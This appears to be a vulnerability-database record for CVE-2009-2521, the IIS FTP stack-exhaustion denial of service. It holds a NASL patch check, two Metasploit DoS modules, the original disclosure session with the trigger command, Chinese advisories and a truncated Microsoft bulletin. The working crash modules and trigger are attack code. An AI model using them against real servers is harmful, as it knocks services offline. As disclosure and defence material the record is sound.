win2k:5, win2003:3, winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\n# MS09-053 Hotfix check\nif((hotfix_missing(name:\"975254\") == 0)){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\inetsrv\\ftpsvc2.dll\");\nif(!dllVer){\n exit(0);\n}\n\n# Windows 2K\nif(hotfix_check_sp(win2k:5) > 0)\n{ \n # Grep for ftpsvc2.dll version < 5.0.2195.7336\n if(version_is_less(version:dllVer, test_version:\"5.0.2195.7336\"))\n {\n security_message(21);\n exit(0);\n }\n}\n\n# Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for ftpsvc2.dll < 6.0.2600.3624\n if(version_is_less(version:dllVer, test_version:\"6.0.2600.3624\")){\n security_message(21);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n # Grep for ftpsvc2.dll < 6.0.2600.5875\n if(version_is_less(version:dllVer, test_version:\"6.0.2600.5875\")){\n security_message(21);\n }\n exit(0);\n }\n security_message(21);\n}\n\n# Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for ftpsvc2.dll version < 6.0.3790.4584\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.4584\")){\n security_message(21);\n }\n exit(0);\n }\n security_message(21);\n}\n\n# Windows Vista\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for the Vista and server 2008 without SP\n if(version_in_range(version:dllVer, test_version:\"7.0.6000.16000\", test_version2:\"7.0.6000.16922\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21122\"))\n {\n security_message(0);\n exit(0);\n }\n\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP){\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0.6001.18000\", test_version2:\"7.0.6001.18326\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6001.22000\", test_version2:\"7.0.6001.22515\"))\n {\n security_message(0);\n exit(0);\n }\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18106\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22218\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:13", "description": "", "published": "2011-07-03T00:00:00", "type": "packetstorm", "title": "Microsoft IIS FTP Server 7.0 Stack Exhaustion", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2521"], "modified": "2011-07-03T00:00:00", "id": "PACKETSTORM:102750", "href": "https://packetstormsecurity.com/files/102750/Microsoft-IIS-FTP-Server-7.0-Stack-Exhaustion.html", "sourceData": "`# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS \n# Date: Jul 03, 2011 \n# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/> \n# Software Link: http://www.microsoft.com/ \n# Version: 5.0 - 7.0 \n# Tested on: unpatched version of windows xp & 2k3 \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::Ftp \ninclude Msf::Auxiliary::Dos \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service', \n'Description' => %q{ \nThis module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as \"manual\" mode in startup type. \n}, \n'Author' => [ \n'Nikolaos \"Kingcope\" Rangos', # Bug Discoverer \n'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 1.0 $', \n'References' => \n[ \n[ 'CVE', '2009-2521'], \n[ 'BID', '36273'], \n[ 'OSVDB', '57753'], \n[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'], \n[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html'] \n \n], \n'DisclosureDate' => 'Sep 03 2009')) \n \nregister_options([ \nOptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]), \nOptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com<script type=\"text/javascript\"> \n/* <![CDATA[ */ \n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); \n/* ]]> */ \n</script>' ]) \n]) \nend \n \ndef run \n \nreturn unless connect_login \n \nprint_status(\"Sending DoS packets ...\") \n \nsend_cmd_data(['ls','-R */../'],nil) \n \ndisconnect \n \nprint_good(\"Done\") \n \nend \nend \n \n`\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102750/msiisftp-dos.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T10:55:59", "description": "Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service. CVE-2009-2521. Dos exploit for windows platform", "published": "2009-09-04T00:00:00", "type": "exploitdb", "title": "Microsoft IIS 5.0/6.0 FTP Server Stack Exhaustion Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2521"], "modified": "2009-09-04T00:00:00", "id": "EDB-ID:9587", "href": "https://www.exploit-db.com/exploits/9587/", "sourceData": "***** MS IIS FTPD DoS ZER0DAY *****\r\n\r\nThere is a DoS vulnerability in the globbing functionality of IIS FTPD.\r\nAnonymous users can exploit this if they have read access to a directory!!!\r\nNormal users can exploit this too if they can read a directory.\r\n\r\nExample session where the anonymous user has read access to the folder \"pub\":\r\n\r\nC:\\Users\\Nikolaos>ftp 192.168.2.102\r\nVerbindung mit 192.168.2.102 wurde hergestellt.\r\n220 Microsoft FTP Service\r\nBenutzer (192.168.2.102:(none)): ftp\r\n331 Anonymous access allowed, send identity (e-mail name) as password.\r\nKennwort:\r\n230 Anonymous user logged in.\r\nftp> ls \"-R p*/../\"\r\n...\r\np*/../pub:\r\npub\r\n...\r\np*/../pub:\r\npub\r\n...\r\np*/../pub:\r\npub\r\n...\r\np*/../pub:\r\npub\r\n...\r\nVerbindung beendet durch Remotehost. (MEANS: Remote Host has closed\r\nthe connection)\r\nftp>\r\nftp>\r\n\r\nBy looking into my debugging session with OllyDbg I see that an\r\nexception is raised and\r\nthe ftp service crashes due to a \"stack overflow\", what is a stack exhaustion.\r\nIf the ftp service is set to \"manual\" startup in services control\r\nmanager the service\r\nneeds to be restarted manually.\r\nIIS 5.0 and 6.0 were tested and are affected.\r\n\r\nBest Regards,\r\n\r\nNikolaos Rangos\r\n\r\n# milw0rm.com [2009-09-04]\r\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9587/"}, {"lastseen": "2016-02-02T07:56:27", "description": "Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053). CVE-2009-2521. Dos exploit for windows platform", "published": "2011-07-03T00:00:00", "type": "exploitdb", "title": "Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS MS09-053", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2521"], "modified": "2011-07-03T00:00:00", "id": "EDB-ID:17476", "href": "https://www.exploit-db.com/exploits/17476/", "sourceData": "# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS\r\n# Date: Jul 03, 2011\r\n# Updated: Jul 13, 2011\r\n# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>\r\n# Software Link: http://www.microsoft.com/\r\n# Version: 5.0 - 7.0\r\n# Tested on: unpatched version of windows xp & 2k3\r\n\r\n##\r\n# $Id: $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\tinclude Msf::Auxiliary::Dos\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" service must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\r\n\t\t\t},\r\n\t\t\t'Author' => [\r\n\t\t\t\t\t'Nikolaos \"Kingcope\" Rangos', # Bug Discoverer\r\n\t\t\t\t\t'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module\r\n\t\t\t\t\t],\t\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 4 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-2521'],\r\n\t\t\t\t\t[ 'BID', '36273'],\r\n\t\t\t\t\t[ 'OSVDB', '57753'],\r\n\t\t\t\t\t[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\r\n\t\t\t\t\t[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\r\n\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Sep 03 2009'))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),\r\n\t\t\tOptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com' ])\r\n\t\t])\r\n\tend\r\n\r\n\tdef run\t\t\t\t\r\n\t\tbegin\r\n\t\t\treturn unless connect_login\r\n\t\t\tprint_status('Checking if there is at least one directory ...')\t\r\n\t\t\tres = send_cmd_data(['ls'],'')\t\r\n\t\t\t\r\n\t\t\tif res.to_s =~ /\\<DIR\\> / then\r\n\t\t\t\tprint_status('Directory found, skipped creating a directory')\r\n\t\t\telse\r\n\t\t\t\tprint_status('No single directory found')\r\n\t\t\t\tprint_status('Attempting to create a directory ...')\t\r\n\t\t\t\tnew_dir = Rex::Text.rand_text_alphanumeric(6)\t\t\r\n\t\t\t\tres = send_cmd(['mkd',new_dir])\t\t\t\r\n\t\t\t\tif res =~ /directory created/ then\r\n\t\t\t\t\tprint_status(\"New directory \\\"#{new_dir}\\\" was created!\")\r\n\t\t\t\telse\r\n\t\t\t\t\tprint_error('Write-access was denied')\r\n\t\t\t\t\tprint_error('Exploit failed')\r\n\t\t\t\t\tdisconnect\r\n\t\t\t\t\treturn\r\n\t\t\t\tend\t\t\r\n\t\t\tend\t\t\r\n\t\t\t\r\n\t\t\tprint_status(\"Sending DoS packets ...\")\t\r\n\t\t\tres = send_cmd_datax(['ls','-R */../'],' ')\t\t\t\t\r\n\t\t\tdisconnect\t\t\t\t\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue Errno::ECONNRESET\r\n\t\t\tprint_good(\"MS IIS FTP Server has crashed successfully.\")\t\r\n\t\trescue ::Rex::ConnectionRefused\r\n\t\t\tprint_good(\"Cannot connect. The server is not running.\")\t\r\n\t\tend\r\n\tend\r\n\r\n\t# Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\r\n\t# Bug Tracker: 4868\r\n\tdef send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\r\n\t\targs[0] = \"LIST\"\r\n\t\t# Set the transfer mode and connect to the remove server\r\n\t\treturn nil if not data_connect(mode)\r\n\t\t# Our pending command should have got a connection now.\r\n\t\tres = send_cmd(args, true, nsock)\r\n\t\t# make sure could open port\r\n\t\treturn nil unless res =~ /^(150|125) /\r\n\t\t# dispatch to the proper method\r\n\t\tbegin\r\n\t\t\tdata = self.datasocket.get_once(-1, ftp_timeout)\r\n\t\trescue ::EOFError\r\n\t\t\tdata = nil\r\n\t\tend\r\n\t\tselect(nil,nil,nil,1)\r\n\t\t# close data channel so command channel updates\r\n\t\tdata_disconnect\r\n\t\t# get status of transfer\r\n\t\tret = nil\r\n\t\tret = recv_ftp_resp(nsock)\r\n\t\tret = [ ret, data ]\r\n\t\tret\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17476/"}], "seebug": [{"lastseen": "2017-11-19T18:37:25", "description": "BUGTRAQ ID: 36273\r\nCVE(CAN) ID: CVE-2009-2521\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\nIIS\u7684FTPd\u7684Glob\u529f\u80fd\u5728\u5904\u7406\u9012\u5f52\u76ee\u5f55\u5217\u8868\u8bf7\u6c42\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u62e5\u6709\u5bf9\u76ee\u5f55\u5199\u8bbf\u95ee\u6743\u9650\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u5305\u542b\u6709\u901a\u914d\u7b26\uff08\u5982\u201c*\u201d\uff09\u7684\u8bf7\u6c42\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4FTP\u670d\u52a1\u5d29\u6e83\u3002\n\nMicrosoft IIS 7.0\r\nMicrosoft IIS 6.0\r\nMicrosoft IIS 5.1\r\nMicrosoft IIS 5.0\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.microsoft.com/technet/security/", "published": "2009-09-08T00:00:00", "title": "Microsoft IIS FTP\u670d\u52a1\u5668\u9012\u5f52\u5217\u8868\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2521"], "modified": "2009-09-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12236", "id": "SSV:12236", "sourceData": "\n ftp> ls "-R p*/../"\n ", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12236"}, {"lastseen": "2017-11-19T18:34:00", "description": "BUGTRAQ ID: 36273\r\nCVE ID: CVE-2009-2521\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\nIIS\u7684FTPd\u7684Glob\u529f\u80fd\u5728\u5904\u7406\u9012\u5f52\u76ee\u5f55\u5217\u8868\u8bf7\u6c42\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u62e5\u6709\u5bf9\u76ee\u5f55\u5199\u8bbf\u95ee\u6743\u9650\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u5305\u542b\u6709\u901a\u914d\u7b26\uff08\u5982\u201c*\u201d\uff09\u7684\u8bf7\u6c42\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4FTP\u670d\u52a1\u5d29\u6e83\u3002\n\nMicrosoft IIS 7.0\r\nMicrosoft IIS 6.0\r\nMicrosoft IIS 5.1\r\nMicrosoft IIS 5.0\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u7981\u7528FTP\u670d\u52a1\u3002\r\n* \u7981\u6b62\u533f\u540d\u7528\u6237\u7684FTP\u8bbf\u95ee\u6216\u5199\u8bbf\u95ee\u3002\r\n* \u4fee\u6539NTFS\u6587\u4ef6\u7cfb\u7edf\u6743\u9650\uff0c\u7981\u6b62FTP\u7528\u6237\u521b\u5efa\u76ee\u5f55\u3002\r\n* \u5347\u7ea7\u5230FTP Service 7.5\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS09-053\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS09-053\uff1aVulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx?pf=true", "published": "2009-10-16T00:00:00", "title": "Microsoft IIS FTP\u670d\u52a1\u5668\u9012\u5f52\u5217\u8868\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e(MS09-053)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2521"], "modified": "2009-10-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12477", "id": "SSV:12477", "sourceData": "\n ftp> ls "-R p*/../"\n ", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12477"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-2521", "CVE-2009-3023"], "description": "Microsoft Security Bulletin MS09-053 - Important\r\nVulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)\r\nPublished: October 13, 2009\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves two publicly disclosed vulnerabilities in the FTP Service in Microsoft Internet Information Services (IIS) 5.0, Microsoft Internet Information Services (IIS) 5.1, Microsoft Internet Information Services (IIS) 6.0, and Microsoft Internet Information Services (IIS) 7.0. On IIS 7.0, only FTP Service 6.0 is affected. The vulnerabilities could allow remote code execution (RCE) on systems running FTP Service on IIS 5.0, or denial of service (DoS) on systems running FTP Service on IIS 5.0, IIS 5.1, IIS 6.0 or IIS 7.0.\r\n\r\nThis security update is rated Important for IIS 5.0; IIS 5.1; IIS 6.0; and FTP Service 6.0 on IIS 7.0. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerabilities by modifying the way that the FTP Service handles list operations. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nThis security update also addresses the vulnerability first described in Microsoft Security Advisory 975191.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update at the earliest opportunity using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. Microsoft Knowledge Base Article 975254 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues.\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tComponent\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nIIS 5.0 (FTP Service 5.0)\t \t \t \t \r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nMicrosoft Internet Information Services 5.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nNone\r\nIIS 5.1 (FTP Service 5.1)\t \t \t \t \r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nMicrosoft Internet Information Services 5.1\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 5.1\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\nIIS 6.0 (FTP Service 6.0)\t \t \t \t \r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 6.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 6.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 6.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\nIIS 7.0 (FTP Service 6.0)\t \t \t \t \r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN articles, Server Core and Server Core for Windows Server 2008 R2. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\n\r\nNon-Affected Software\r\n\r\nOperating System\r\n\t\r\n\r\nComponent\r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0 (FTP Service 7.5*)\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0 (FTP Service 7.5*)\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0 (FTP Service 7.5*)\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.0 (FTP Service 7.5*)\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.5 (FTP Service 7.5)\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.5 (FTP Service 7.5)\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.5 (FTP Service 7.5)\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nMicrosoft Internet Information Services 7.5 (FTP Service 7.5)\r\n\r\n*Available as an out-of-box download. See entry in Frequently Asked Questions.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nI installed FTP using Windows Server 2008 Server Manager. Is my system affected?\r\nWhen you use Windows Server 2008 Server Manager to install FTP, you are installing FTP Service 6.0, which is affected. Microsoft recommends that you install the appropriate security update from this bulletin or upgrade to FTP Service 7.5.\r\n\r\nIs FTP Service 7.5 for Windows Vista or Windows Server 2008 affected by this vulnerability?\r\nNo. FTP Service 7.5, available as an out-of-box download for 32-bit and x64-based versions of Windows Vista and Windows Server 2008, is not affected by this vulnerability. See the following sites on Download Center:\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 (x86)\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 (x64)\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. To determine the support life cycle for your software release, visit Microsoft Support Lifecycle.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit Microsoft Support Lifecycle. For more information about the extended security update support period for these software versions or editions, visit Microsoft Product Support Services.\r\n\r\nCustomers who require custom support for older releases must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit Microsoft Worldwide Information, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the October bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tIIS FTP Service DoS Vulnerability - CVE-2009-2521\tIIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\tAggregate Severity Rating\r\nIIS 5.0 (FTP Service 5.0)\t \t \t \r\n\r\nMicrosoft Internet Information Services 5.0 on\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nImportant\r\nDenial of Service\r\n\t\r\n\r\nImportant\r\nRemote Code 